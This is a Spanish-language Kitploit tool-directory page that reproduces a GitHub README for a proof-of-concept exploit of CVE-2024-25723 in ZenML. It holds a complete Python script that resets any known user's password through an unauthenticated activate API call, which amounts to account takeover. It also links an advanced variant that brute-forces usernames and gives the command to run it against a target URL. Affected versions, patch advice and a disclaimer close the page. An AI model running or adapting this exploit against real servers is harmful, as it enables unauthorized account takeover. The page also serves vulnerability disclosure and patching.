Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
exploit-CVE-2024-25723 — Exploit educativo de prueba de concepto para CVE-2024-25723, que demuestra la toma de control de cuenta no autorizada en ZenML mediante restablecimiento de contraseña de API, con detección de versión y enumeración de nombres de usuario por fuerza bruta. | Kitploit
Herramientas/GitHubGitHub/david-botelho-mariano/exploit-cve-2024-25723
Ataques de ContraseñasAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y Educación
GitHubdavid-botelho-mariano/exploit-cve-2024-25723

exploit-CVE-2024-25723

Exploit educativo de prueba de concepto para CVE-2024-25723, que demuestra la toma de control de cuenta no autorizada en ZenML mediante restablecimiento de contraseña de API, con detección de versión y enumeración de nombres de usuario por fuerza bruta.

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio
42hace 2 añosAún no revisado

Exploit para CVE-2024-25723

Este repositorio está dedicado a abordar CVE-2024-25723, una vulnerabilidad de seguridad crítica en ZenML, con un Prueba de Concepto (PoC) educativa proporcionada para ilustrar el problema y fomentar una mitigación rápida. El PoC demuestra cómo un usuario no autorizado podría explotar la vulnerabilidad para tomar posesión de cualquier cuenta de ZenML.

Prueba de concepto (PoC)

  1. Iniciar el servidor ZenML a través de docker.

docker run -it -d -p 8080:8080 --name zenml zenmldocker/zenml-server:0.46.0

  1. Guarda el código siguiente como "exploit-CVE-2024-25723.py" y luego ejecuta "python exploit-CVE-2024-25723.py".
root@kitploit:~
import requests

base_url = "http://localhost:8080"
user = "default"
new_password = "3gx9AbzP92rfHhZ"

activate_api_url = f"{base_url}/api/v1/users/{user}/activate"
activate_api_headers = {"Content-Type": "application/json"}
activate_api_json={"password": new_password}
activate_api_response = requests.put(activate_api_url, headers=activate_api_headers, json=activate_api_json)
print(activate_api_response.json())
  1. Si el usuario por defecto llamado "default" está registrado y ZenML está en una versión vulnerable, el exploit se ejecutará con éxito y la nueva contraseña para esta cuenta será: "3gx9AbzP92rfHhZ" (para que el exploit funcione, es necesario conocer el nombre del usuario objetivo).

Exploit avanzado

La diferencia entre el PoC y el exploit avanzado es que el exploit avanzado realiza fuerza bruta en los nombres de usuario más utilizados y también es capaz de detectar si la versión es vulnerable o no a través de una API que filtra la versión de ZenML. Para usar el exploit avanzado guarda el siguiente código en un archivo:

https://github.com/david-botelho-mariano/exploit-CVE-2024-25723/blob/main/advanced-exploit-CVE-2024-25723.py

El comando para ejecutar este exploit es:

python3 advanced-exploit-CVE-2024-25723.py https://example.com

Versiones afectadas:

Todas las versiones de ZenML por debajo de 0.46.7 son vulnerables, con la excepción de las siguientes versiones de parche: (0.44.4, 0.43.1, 0.42.2).

Acción inmediata requerida:

Actualiza a la última versión (0.46.7 o superior) o a una de las versiones parcheadas (0.44.4, 0.43.1, 0.42.2) para mitigar este riesgo.

Descargo de responsabilidad

La Prueba de Concepto (PoC) proporcionada en este repositorio es únicamente con fines educativos y de investigación en seguridad. La información y el código están destinados a ser utilizados por profesionales e investigadores en ciberseguridad para comprender y protegerse contra vulnerabilidades en software y sistemas. Cualquier uso de este PoC, información relacionada o código para atacar objetivos sin consentimiento mutuo previo es ilegal y está estrictamente prohibido.

Al usar este PoC, aceptas que comprendes el impacto potencial de la vulnerabilidad que demuestra y que lo usarás de manera responsable y ética. Los autores de este PoC renuncian a cualquier responsabilidad por cualquier uso indebido de este material o cualquier daño que pueda ocurrir por usar la información y el código proporcionados. Es responsabilidad del usuario final cumplir con todas las leyes locales, estatales, nacionales e internacionales aplicables.

Los autores han hecho todo lo posible para garantizar la precisión y fiabilidad de la información proporcionada en este repositorio. Sin embargo, la información se proporciona "tal cual" sin garantía de ningún tipo. Los autores no aceptan ninguna responsabilidad u obligación por la precisión, el contenido, la integridad, la legalidad o la fiabilidad de la información contenida.

Descargar herramienta